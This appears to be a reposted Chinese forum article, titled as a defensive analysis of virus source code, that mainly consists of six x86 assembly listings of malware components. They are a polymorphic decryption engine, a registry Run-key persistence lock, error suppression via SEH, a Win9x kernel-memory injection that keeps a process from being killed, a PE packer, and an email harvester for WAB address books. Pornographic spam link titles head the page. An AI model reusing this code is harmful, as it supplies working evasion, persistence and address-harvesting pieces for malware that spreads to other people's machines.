丰满人妻一区二区三区无码AV|国产乱色国产精品免费视频|国产精品一区二区不卡的视频|2020精品国产福利在线观看香蕉

    1. <rp id="2o2at"><nav id="2o2at"></nav></rp>
      
      

      <rt id="2o2at"></rt>
      <ruby id="2o2at"><nav id="2o2at"></nav></ruby>

    2. <rp id="2o2at"><meter id="2o2at"></meter></rp>

        <tt id="2o2at"><form id="2o2at"></form></tt>

      1. <source id="2o2at"></source>

          首頁 > 編程 > Java > 正文

          病毒源碼解析之防御分析

          2019-09-06 23:33:18
          字體:
          來源:轉載
          供稿:網友
          1、超級病毒變形引擎

          此段代碼會在DATA段內生成一個解密代碼。

          .586p
          .model flat,STDCALL
          extrn ExitProcess: proc
          VirusSize=100h
          .data

          DecodeMethod dd ?
          DeCode:
          pushad
          call Encode
          db 100h dup(11h)
          Encode:
          db 100h dup(0cch)
          RndReg0 dd 0 ;eax
          RndReg1 dd 0 ;ebx
          RndCode dd 0 ;Rnd Code
          RndMima dd 60932561 ;Rnd Password

          .code
          @@Start:
          mov eax,RndMima
          ror eax,7
          mov RndCode,eax

          mov eax,RndCode
          mov ecx,eax
          and eax,011b
          mov RndReg0,eax
          xor ecx,RndMima
          and ecx,011b
          cmp eax,ecx
          jnz short ChooseRegOk
          inc ecx
          and ecx,011b
          ChooseRegOk:
          mov RndReg1,ecx


          mov edi,offset Encode

          ror RndCode,1
          call GetBxCode,0,RndReg0,RndCode
          mov esi,eax
          ContFillStep0:
          cld
          lodsb
          stosb
          cmp al,0cch
          jnz ContFillStep0
          dec edi

          ror RndCode,1
          call GetBxCode,1,RndReg1,RndCode
          mov esi,eax
          ContFillStep1:
          cld
          lodsb
          stosb
          cmp al,0cch
          jnz ContFillStep1
          dec edi

          mov ebx,edi ;//計算機Jmp指令用

          ror RndCode,1
          call GetBxCode,2,RndReg0,RndCode
          mov esi,eax
          ContFillStep2:
          cld
          lodsb
          stosb
          cmp al,0cch
          jnz ContFillStep2
          dec edi

          mov eax,RndMima
          mov [edi-4],eax ;//填寫隨機密碼
          mov eax,RndCode
          and eax,01
          mov DecodeMethod,eax ;//填寫DeCode方法

          ror RndCode,1
          call GetBxCode,3,RndReg0,RndCode
          mov esi,eax
          ContFillStep3:
          cld
          lodsb
          stosb
          cmp al,0cch
          jnz ContFillStep3
          dec edi

          ror RndCode,1
          call GetBxCode,4,RndReg1,RndCode
          mov esi,eax
          ContFillStep4:
          cld
          lodsb
          stosb
          cmp al,0cch
          jnz ContFillStep4
          dec edi

          ror RndCode,1
          call GetBxCode,5,RndReg0,RndCode
          mov esi,eax
          ContFillStep5:
          cld
          lodsb
          stosb
          cmp al,0cch
          jnz ContFillStep5
          dec edi

          mov al,0c3h
          mov [edi],al ;//填寫Ret指令

          sub ebx,edi
          mov [edi-1],bl ;//填寫jmp指令

          int 3;

          jmp DeCode
          ret
          GetBxCode proc uses ebx ecx edx esi edi,Step:dword,Reg:dword,Rnd:dword
          call GetBxCodeAddr
          Step0_Eax:
          mov eax,[esp]
          int 3;
          pop eax
          push eax
          int 3;
          Step0_Ebx:
          pop ebx
          push ebx
          int 3;
          push dword ptr[esp]
          pop ebx
          int 3;
          Step0_Ecx:
          mov ecx,[esp]
          int 3;
          pop ecx
          push ecx
          int 3;
          Step0_Edx:
          mov edx,[esp]
          int 3;
          mov edx,esp
          mov edx,[edx]
          int 3

          Step1_Eax:
          mov eax,VirusSize
          int 3
          sub eax,eax
          add ax,VirusSize+3081h
          sub ax,3081h
          int 3
          Step1_Ebx:
          mov ebx,VirusSize
          int 3;
          xor ebx,ebx
          or bx,VirusSize
          int 3;
          Step1_Ecx:
          sub ecx,ecx
          xor ecx,(VirusSize xor 3181h)
          xor ecx,(3181h)
          int 3;
          mov ecx,0
          and cx,VirusSize
          int 3
          Step1_Edx:
          and edx,0
          xor dx,(VirusSize-0281h)
          add dx,0281h
          int 3;
          xor edx,edx
          sub edx,(0181h-VirusSize)
          sub edx,-0181h
          int 3;

          Setp2_Eax:
          xor [eax],12345678h
          int 3
          add [eax],12345678h
          int 3
          Setp2_Ebx:
          xor [ebx],12345678h
          int 3;
          add [ebx],12345678h
          int 3;

          Setp2_Ecx:
          xor [ecx],12345678h
          int 3;
          add [ecx],12345678h
          int 3;
          Setp2_Edx:
          xor [edx],12345678h
          int 3;
          add [edx],12345678h
          int 3;
          Step3_Eax:
          add eax,4
          int 3
          inc eax
          inc eax
          inc eax
          inc eax
          int 3;
          Step3_Ebx:
          add ebx,5
          dec ebx
          int 3
          add ebx,2
          add ebx,2
          int 3;
          Step3_Ecx:
          sub ecx,-4
          int 3
          sub ecx,-5
          dec ecx
          int 3;
          Step3_Edx:
          inc edx
          sub edx,-3
          int 3
          add edx,04
          int 3;

          Step4_Eax:
          sub eax,4
          int 3
          dec eax
          dec eax
          dec eax
          sub eax,1
          int 3;
          Step4_Ebx:
          dec ebx
          sub ebx,3
          int 3;
          dec ebx
          dec ebx
          sub ebx,2
          int 3;
          Step4_Ecx:
          add cx,123
          sub cx,123+4
          int 3
          sub cx,-4
          dec cx
          sub cx,7
          int 3
          Step4_Edx:
          sub dx,2
          dec dx
          sub dx,1
          int 3
          inc edx
          sub dx,5
          int 3;
          Step5_Eax:
          jnz $
          int 3
          ja $
          int 3
          Step5_Ebx:
          jg $
          int 3
          jnb $
          int 3
          Step5_Ecx:
          jnl $
          int 3
          jnz $
          int 3
          Step5_Edx:
          ja $
          int 3
          jg $
          int 3

          GetBxCodeAddr:
          pop esi
          mov al,0cch ;//指令分割符
          mov ecx,Step
          shl ecx,1
          shl ecx,1
          add ecx,Reg ;//計算機得到的指令位置
          shl ecx,1
          and Rnd,01b
          add ecx,Rnd
          jcxz short GetBxCodeOver
          ContFindCode:
          push ecx
          ContFindCC:
          inc esi
          cmp [esi],al
          jnz ContFindCC
          pop ecx
          loop ContFindCode
          mov eax,esi
          inc eax
          ret
          GetBxCodeOver:
          mov eax,esi
          ret
          GetBxCode endp


          end @@Start


          2、Windows 9x/2000/xp 瑣定注冊表

          .586p
          .model flat,STDCALL
          .data

          HKeyStr db 'SOFTWAREMicrosoftWindowsCurrentVersionRun',0
          ValueName db 'wap32',0
          PathName db 'wap32.exe',0

          .code

          extrn RegOpenKeyA: proc
          extrn RegSetValueExA: proc
          extrn RegCloseKey: proc
          extrn ExitProcess: proc
          extrn RegNotifyChangeKeyValue: proc
          extrn CreateThread: proc
          extrn Sleep: proc
          extrn RegQueryValueExA: proc

          start:
          push eax
          call RegOpenKeyA,080000002h,offset HKeyStr,esp
          pop ebx
          call RegSetValueExA,ebx,offset ValueName,0,01,offset PathName,100h

          sub esp,100h
          mov eax,esp
          push 100h
          call RegQueryValueExA,ebx,offset ValueName,0,0,eax,esp
          pop eax
          add esp,100h

          push eax
          call CreateThread,0,0,offset RegProtectProc,ebx,0,esp
          pop eax
          call Sleep,1000*60*3
          ret

          RegProtectProc proc hKey:dword
          mov ebx,hKey
          sub esp,100h
          mov edi,esp
          call GetProtectKeyName
          db 'wap32',0
          GetProtectKeyName:
          pop esi
          push 100h
          call RegQueryValueExA,ebx,esi,0,0,edi,esp
          pop eax
          WaitRegChangeNotify:
          call RegNotifyChangeKeyValue,ebx,0,4,0,0
          call RegSetValueExA,ebx,esi,0,01,edi,100h
          jmp short WaitRegChangeNotify
          RegProtectProc endp

          end start



          3、 Windows 9x/2000 意外處理通用程序


          此段程序可以達到屏蔽程序錯誤的效果

          include wap32.inc

          .386p
          .model flat,stdcall

          extrn MessageBoxA: proc
          extrn ExitProcess: proc

          .data

          Msg db 'Fuck',0

          SetSehFrame: ;ecx=忽略錯誤繼續執行地址
          pop eax ;彈出返回地址
          push ecx ;保存忽略錯誤繼續執行地址
          call PushExceptionProc
          jmp short Exception
          PushExceptionProc:
          push fs:dword ptr[0]
          mov fs:[0],esp
          call GetEspAddr
          push D [edx] ;保存原Esp地址值
          mov [edx],esp
          jmp eax
          ClearSehFrame:
          pop eax ;彈出返回地址
          call GetEspAddr
          mov esp,[edx]
          pop D [edx] ;恢復原Esp地址值
          pop fs:dword ptr[0]
          pop ecx
          pop ecx ;彈出忽略錯誤繼續執行地址
          jmp eax

          Exception proc pRecord,pFrame,pContext,pDispatch
          call PushSehBackProc
          call ClearSehFrame
          jmp ecx
          PushSehBackProc:
          pop ecx
          mov eax,pContext
          mov [eax.cx_Eip],ecx
          xor eax,eax ;忽略錯誤繼續執行
          ret
          Exception endp

          GetEspAddr:
          call PushOffsetEspAddr
          dd ?
          PushOffsetEspAddr:
          pop edx
          ret


          .code

          Start:
          call PushErrorProc
          call MessageBoxA,0,offset Msg,offset Msg,0
          ret
          PushErrorProc:
          pop ecx
          call SetSehFrame
          mov ds:[0],eax
          call ClearSehFrame
          ret


          end Start



          4、Windows 9x 下進程不死術

          此段程序首先實現Win9x下注射遠程線程(新技術)
          然后與Win2k下進程不死術一樣了。
          include Win32.inc

          .386p
          .model flat,stdcall

          extrn GetProcAddress: proc
          extrn WinExec: proc
          extrn MessageBoxA: proc
          extrn Sleep: proc
          extrn GetCurrentProcessId: proc
          extrn OpenProcess: proc
          extrn GetCurrentProcess: proc
          extrn WriteProcessMemory: proc
          extrn GetExitCodeProcess: proc

          .data

          ;問題,要Sleep()這樣做使Kernel32有機會更新數據
          KnlThread proc ProcID:dword
          call GetKnlOpenProcess
          KnlOpenProcess dd ?
          GetKnlOpenProcess:
          pop eax
          call [eax],PROCESS_ALL_ACCESS,FALSE,ProcID
          or eax,eax
          jz short ExitProtectProc
          mov ebx,eax
          call GetKnlWaitForSingleObject
          KnlWaitForSingleObject dd ?
          GetKnlWaitForSingleObject:
          pop eax
          call [eax],ebx,-1h
          call GetFileNameAddress
          GetFileNameAddress:
          pop ecx
          add ecx,offset FileName-offset GetFileNameAddress
          call GetKnlWinExec
          KnlWinExec dd ?
          GetKnlWinExec:
          pop eax
          call [eax],ecx,01
          ExitProtectProc:
          ret
          KnlThread endp

          FileName db 'c:wap32.exe',0

          KnlOpenProcessStr db 'OpenProcess',0
          KnlWaitForObjectStr db 'WaitForSingleObject',0
          KnlWinExecStr db 'WinExec',0
          KnlSleepStr db 'Sleep',0
          KnlCreateKnlThreadStr db 'CreateKernelThread',0

          .code

          Start:
          call GetProcAddress,0bff70000h,offset KnlOpenProcessStr
          mov KnlOpenProcess,eax
          call GetProcAddress,0bff70000h,offset KnlWaitForObjectStr
          mov KnlWaitForSingleObject,eax
          call GetProcAddress,0bff70000h,offset KnlWinExecStr
          mov KnlWinExec,eax

          call MoveDataToKnl,offset Start,0bff70600h,100h

          call GetProcAddress,0bff70000h,offset KnlCreateKnlThreadStr
          mov ebx,eax
          call GetCurrentProcessId
          push eax
          call ebx,0,0,0bff70000h+600h,eax,0,esp
          pop eax
          call MessageBoxA,0,offset FileName,offset FileName,0
          ret

          MoveDataToKnl proc uses ebx esi edi,Src:dword,Des:dword,nCx:dword
          push eax
          sidt [esp-2]
          pop eax
          add eax,3*8
          mov ebx,[eax]
          mov edx,[eax+4]
          call SetIdt03
          pushad
          mov [eax],ebx
          mov [eax+4],edx
          cld
          rep movsb
          popad
          iret
          SetIdt03:
          cli
          pop W[eax]
          pop W[eax+6]
          mov esi,Src
          mov edi,Des
          mov ecx,nCx
          int 3;
          sti
          ret
          MoveDataToKnl endp

          end Start


          5、簡單算法,高效率壓縮PE文件

          .586p
          .model flat,STDCALL
          .data

          OldFile db 'pe.exe',0
          NewFile db 'pe.zzz',0

          FileData db 0,0
          .code
          extrn _lopen: proc,_lcreat: proc
          extrn _lread: proc,_lwrite: proc
          extrn _lclose: proc
          extrn ExitProcess: proc
          start:
          call _lopen,offset OldFile,0
          cmp eax,-1
          jz ExitProc
          mov esi,eax
          call _lcreat,offset NewFile,0
          cmp eax,-1
          jz CloseOldFile
          mov edi,eax

          xor ebx,ebx
          ReadData:
          call _lread,esi,offset FileData,1
          or eax,eax
          jz short ReadOver
          movzx eax,FileData
          or eax,eax
          jnz short NoZero
          inc ebx
          cmp ebx,0ffh
          jnz short ReadData
          xor eax,eax
          mov ah,bl
          xchg ax,word ptr FileData
          call _lwrite,edi,offset FileData,2
          xor ebx,ebx
          jmp short ReadData
          NoZero:
          or ebx,ebx
          jnz short NoZeroData
          call _lwrite,edi,offset FileData,1
          jmp short ReadData
          NoZeroData:
          push eax
          xor eax,eax
          mov ah,bl
          mov word ptr FileData,ax
          call _lwrite,edi,offset FileData,2
          xor ebx,ebx
          pop eax
          mov FileData,al
          call _lwrite,edi,offset FileData,1
          jmp ReadData
          ReadOver:
          or ebx,ebx
          jz short CloseFile
          xor eax,eax
          mov ah,bl
          xchg ax,word ptr FileData
          call _lwrite,edi,offset FileData,2
          xor ebx,ebx
          CloseFile:
          call _lclose,edi
          CloseOldFile:
          call _lclose,esi
          ExitProc:
          call ExitProcess,0

          end start

          6、提取Windows地址薄文件(*.WAB)的Email信息

          .586p
          .model flat,STDCALL
          .data

          MailFile db 'My.WAB',0

          .code

          extrn _lopen: proc,_lcreat: proc
          extrn _lread: proc,_lwrite: proc
          extrn _llseek: proc
          extrn _lclose: proc
          extrn MessageBoxA: proc
          extrn ExitProcess: proc
          extrn WideCharToMultiByte: proc

          start:
          call _lopen,offset MailFile,0
          cmp eax,-1
          jz short ExitProc
          mov ebx,eax
          sub esp,100h
          mov edi,esp
          call _lread,ebx,edi,100h
          cmp eax,100h
          jnz short CloseFile
          mov eax,[edi+60h] ;得到Unicode郵件名偏移
          call _llseek,ebx,eax,0
          mov ecx,[edi+64h] ;得到Unicode郵件名個數
          ContWabMail:
          push ecx
          call _lread,ebx,edi,44h ;讀一個記錄
          cmp eax,44
          sub esp,100h
          mov eax,esp
          call WideCharToMultiByte,0,200h,edi,-1,eax,100h,0,0
          mov eax,esp
          call MessageBoxA,0,eax,eax,0
          add esp,100h
          pop ecx
          loop short ContWabMail
          CloseFile:
          call _lclose,ebx
          ExitProc:
          call ExitProcess,0

          end start



          WSS(Whitecell Security Systems),一個非營利性民間技術組織,致力于各種系統安全技術的研究。堅持傳統的hacker精神,追求技術的精純。
          WSS 主頁:http://www.whitecell.org/
          WSS 論壇:http://www.whitecell.org/forum/
          發表評論 共有條評論
          用戶名: 密碼:
          驗證碼: 匿名發表
          1. <rp id="2o2at"><nav id="2o2at"></nav></rp>
            
            

            <rt id="2o2at"></rt>
            <ruby id="2o2at"><nav id="2o2at"></nav></ruby>

          2. <rp id="2o2at"><meter id="2o2at"></meter></rp>

              <tt id="2o2at"><form id="2o2at"></form></tt>

            1. <source id="2o2at"></source>